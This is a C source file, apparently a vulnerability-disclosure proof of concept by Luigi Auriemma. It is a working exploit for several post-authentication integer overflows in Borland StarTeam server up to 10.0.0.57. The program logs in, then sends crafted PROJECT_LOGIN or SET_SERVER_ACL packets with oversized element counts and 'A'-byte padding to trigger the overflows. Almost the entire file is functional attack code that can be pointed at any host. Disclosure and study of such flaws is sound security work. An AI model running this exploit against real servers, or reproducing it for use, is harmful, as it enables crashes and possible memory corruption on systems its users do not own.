/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "show_dump.h"
#include "starteam.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        49201
#define BUFFSZ      0xff00  // max size



int put_starteam_password(u8 *data, u8 *str);
int fgetz(u8 *data, int size, FILE *fd);
int starteam_recv(int sd, u8 *data, int maxsz);
int tcp_recv(int sd, u8 *buff, int len);
int starteam_send(int sd, int id, u8 *data, int datalen);
int starteam_msg_hdr(u8 *data);
int starteam_pck_hdr(u8 *data, int len);
int starteam_id_hdr(u8 *data, int id);
int putcc(u8 *data, int chr, int len);
int putss(u8 *data, u8 *str);
int putmm(u8 *data, u8 *str, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



u8      client_id[16];



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            attack;
    u32     user_id;
    u16     port    = PORT;
    u8      user[128],
            pass[128],  // no, you can't change the size of the password
            *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Borland StarTeam <= 10.0.0.57 multiple post-auth integer overflows "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = integer overflow in PROJECT_LOGIN (folder names list)\n"
            " 2 = integer overflow in PROJECT_LOGIN (folder properties list)\n"
            " 3 = integer overflow in SET_SERVER_ACL\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();
    memset(client_id, 0, sizeof(client_id));

    printf("- insert the username you want to use: ");
    fgetz(user, sizeof(user), stdin);
    printf("- insert the right password: ");
    fgetz(pass, sizeof(pass), stdin);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    p = buff;
    p += putxx(p, -1,           32);
    starteam_send(sd, STARTEAM_SRVR_CMD_GET_SERVER_PARAMS, buff, p - buff);
    len = starteam_recv(sd, buff, BUFFSZ);
    if(len < 0) goto quit;

    p = buff;
    p += putxx(p, -1,           32);
    p += putcc(p, 0,            16);
    p += putss(p, "workstation");
    p += putss(p, "1.58");
    p += putss(p, "en");
    p += putss(p, "US");
    p += putss(p, "");
    p += putss(p, "client_string");
    starteam_send(sd, STARTEAM_SRVR_CMD_SERVER_CONNECT, buff, p - buff);
    len = starteam_recv(sd, buff, BUFFSZ);
    if(len < 0) goto quit;
    memcpy(client_id, buff, sizeof(client_id));

    p = buff;
    p += putxx(p, -1,           32);
    starteam_send(sd, STARTEAM_SRVR_CMD_BEGIN_LOGIN, buff, p - buff);
    len = starteam_recv(sd, buff, BUFFSZ);
    if(len < 0) goto quit;
    getxx(buff, &user_id, 32);

    p = buff;
    p += putxx(p, -1,           32);
    starteam_send(sd, STARTEAM_SRVR_CMD_GET_REQUIRED_ENCRYPTION_LEVEL, buff, p - buff);
    len = starteam_recv(sd, buff, BUFFSZ);
    if(len < 0) goto quit;

    p = buff;
    p += putxx(p, -1,           32);
    p += putxx(p, user_id,      32);
    p += putss(p, user);
    p += put_starteam_password(p, pass);
    p += putss(p, "");  // useless redundant username
    p += putss(p, "");
    starteam_send(sd, STARTEAM_SRVR_CMD_SERVER_LOGIN, buff, p - buff);
    len = starteam_recv(sd, buff, BUFFSZ);
    if(len < 0) goto quit;

    if(!memcmp(buff + 4, "CStSecurity", 11)) {
        printf("\nError: invalid username or password\n");
        goto quit;
    }

    if((attack == 1) || (attack == 2)) {
        p = buff;
        p += putxx(p, -1,           32);
        p += putmm(p, client_id,    16);
        p += putss(p, "new project");
        p += putxx(p, -1,           32);
        p += putxx(p, 0,            32);
        p += putxx(p, 1,            32);
        p += putss(p, "project_description");
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putss(p, "local_path");
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        p += putxx(p, 0,            32);
        if(attack == 1) {
            p += putxx(p, (0xffffffff / 8) + 1, 32);
        } else {
            p += putxx(p, 0, 32);
            p += putxx(p, (0xffffffff / 4) + 1, 32);
        }
        p += putcc(p, 'A', BUFFSZ - (p - buff));
        starteam_send(sd, STARTEAM_SRVR_CMD_PROJECT_LOGIN, buff, p - buff);

    } else if(attack == 3) {
        p = buff;
        p += putxx(p, -1,           32);
        p += putxx(p, (0xffffffff / 12) + 1, 32);
        p += putcc(p, 'A', BUFFSZ - (p - buff));
        starteam_send(sd, STARTEAM_SRVR_CMD_SET_SERVER_ACL, buff, p - buff);

    } else {
        printf("\nError: wrong attack number\n");
        exit(1);
    }

    len = starteam_recv(sd, buff, BUFFSZ);
    if(len < 0) goto quit;

quit:
    close(sd);
    free(buff);
    printf("- done\n");
    return(0);
}



int put_starteam_password(u8 *data, u8 *pwd) {
    int     i,
            len;
    u8      encpwd[128];

    strncpy(encpwd, pwd, sizeof(encpwd));
    len = strlen(encpwd);
    memset(encpwd + len, 0xff, sizeof(encpwd) - len);
    putxx(data, sizeof(encpwd), 32);
    for(i = 0; i < sizeof(encpwd); i++) {
        data[4 + i] = encpwd[i] ^ len;
    }
    return(4 + sizeof(encpwd));
}



int fgetz(u8 *data, int size, FILE *fd) {
    u8      *p;

    fgets(data, size, fd);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
    return(p - data);
}



int starteam_recv(int sd, u8 *data, int maxsz) {
    u32     len;
    u8      pck_hdr[16];

    if(tcp_recv(sd, pck_hdr, sizeof(pck_hdr)) < 0) return(-1);
    getxx(pck_hdr + 4, &len, 32);
    if(len > maxsz) {
        printf("\nError: incoming packet is bigger than how much supported\n");
        exit(1);
    }
    if(tcp_recv(sd, data, len) < 0) return(-1);
    show_dump(data, len, stdout);
    return(len);
}



int tcp_recv(int sd, u8 *buff, int len) {
    int     t;
    u8      *p;

    for(p = buff; len; p += t, len -= t) {
        if(timeout(sd, 3) < 0) return(-1);
        t = recv(sd, p, len, 0);
        if(t <= 0) return(-1);
    }
    return(0);
}



int starteam_send(int sd, int id, u8 *data, int datalen) {
    int     msg_hdr_len,
            pck_hdr_len,
            id_hdr_len;
    u8      msg_hdr[20],
            pck_hdr[16],
            id_hdr[38];

    msg_hdr_len = starteam_msg_hdr(msg_hdr);
    id_hdr_len  = starteam_id_hdr(id_hdr, id);
    pck_hdr_len = starteam_pck_hdr(pck_hdr, id_hdr_len + datalen);

    printf("- send packet %u\n", id);

    if(send(sd, msg_hdr, msg_hdr_len, 0) != msg_hdr_len) return(-1);
    if(send(sd, pck_hdr, pck_hdr_len, 0) != pck_hdr_len) return(-1);
    if(send(sd, id_hdr,  id_hdr_len,  0) != id_hdr_len)  return(-1);
    if(send(sd, data,    datalen,     0) != datalen)     return(-1);
    return(0);
}



int starteam_msg_hdr(u8 *data) {
    u8      *p;

    p = data;
    p += putxx(p, 0,            32);    // session tag
    p += putxx(p, 0,            32);    // timestamp
    p += putxx(p, 0x10000000,   32);    // flags (|1 for zlib)
    p += putxx(p, 0,            32);    // key id
    p += putxx(p, 0,            32);    // reserved
    return(p - data);
}



int starteam_pck_hdr(u8 *data, int len) {
    u8      *p;

    p = data;
    p += putxx(p, 0x6e616c41,   32);    // Alan
    p += putxx(p, len,          32);    // packet size
    p += putxx(p, len,          32);    // data size
    p += putxx(p, 8,            32);    // flags
    return(p - data);
}



int starteam_id_hdr(u8 *data, int id) {
    u8      *p;

    p = data;
    p += putxx(p, 100,          16);    // revision level
    p += putmm(p, client_id,    16);    // client id
    p += putxx(p, 0,            32);    // connect ID
    p += putxx(p, 0,            32);    // component ID
    p += putxx(p, id,           32);    // command ID
    p += putxx(p, 0,            32);    // command time
    p += putxx(p, 0,            32);    // command user ID
    return(p - data);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int putss(u8 *data, u8 *str) {
    int     len;

    len = strlen(str);
    putxx(data, len, 32);
    memcpy(data + 4, str, len);
    return(4 + len);
}



int putmm(u8 *data, u8 *str, int len) {
    memcpy(data, str, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


